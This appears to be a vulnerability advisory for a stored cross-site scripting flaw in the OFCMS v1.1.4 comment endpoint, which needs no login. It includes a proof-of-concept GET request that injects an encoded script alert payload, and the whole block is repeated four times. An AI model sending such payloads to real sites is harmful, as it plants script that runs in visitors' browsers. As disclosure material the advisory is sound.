Cross-site scripting vulnerability exists in the front page of OFCMS system. The user comment function in the foreground of the system does not escape the input parameters effectively. In addition, the comment function does not require login verification, which leads to a high risk of cross-site scripting vulnerability.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://gitee.com/oufu/ofcms
[Affected Product Code Base]
v1.1.4
[Affected Component]
GET /ofcms/api/v1/comment/save.json?comment_content=%E6%B5%8B%E8%AF%95%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E111&content_id=47&site_id=1&check_status=1&_=1647846678826 HTTP/1.1
Host: localhost:7000
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Cross-site scripting vulnerability exists in the front page of OFCMS system. The user comment function in the foreground of the system does not escape the input parameters effectively. In addition, the comment function does not require login verification, which leads to a high risk of cross-site scripting vulnerability.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://gitee.com/oufu/ofcms
[Affected Product Code Base]
v1.1.4
[Affected Component]
GET /ofcms/api/v1/comment/save.json?comment_content=%E6%B5%8B%E8%AF%95%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E111&content_id=47&site_id=1&check_status=1&_=1647846678826 HTTP/1.1
Host: localhost:7000
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Cross-site scripting vulnerability exists in the front page of OFCMS system. The user comment function in the foreground of the system does not escape the input parameters effectively. In addition, the comment function does not require login verification, which leads to a high risk of cross-site scripting vulnerability.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://gitee.com/oufu/ofcms
[Affected Product Code Base]
v1.1.4
[Affected Component]
GET /ofcms/api/v1/comment/save.json?comment_content=%E6%B5%8B%E8%AF%95%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E111&content_id=47&site_id=1&check_status=1&_=1647846678826 HTTP/1.1
Host: localhost:7000
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Cross-site scripting vulnerability exists in the front page of OFCMS system. The user comment function in the foreground of the system does not escape the input parameters effectively. In addition, the comment function does not require login verification, which leads to a high risk of cross-site scripting vulnerability.
[Vulnerability Type]
Cross Site Scripting (XSS)
[Vendor of Product]
https://gitee.com/oufu/ofcms
[Affected Product Code Base]
v1.1.4
[Affected Component]
GET /ofcms/api/v1/comment/save.json?comment_content=%E6%B5%8B%E8%AF%95%3Cscript%3Ealert(%22xss%22)%3C%2Fscript%3E111&content_id=47&site_id=1&check_status=1&_=1647846678826 HTTP/1.1
Host: localhost:7000
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
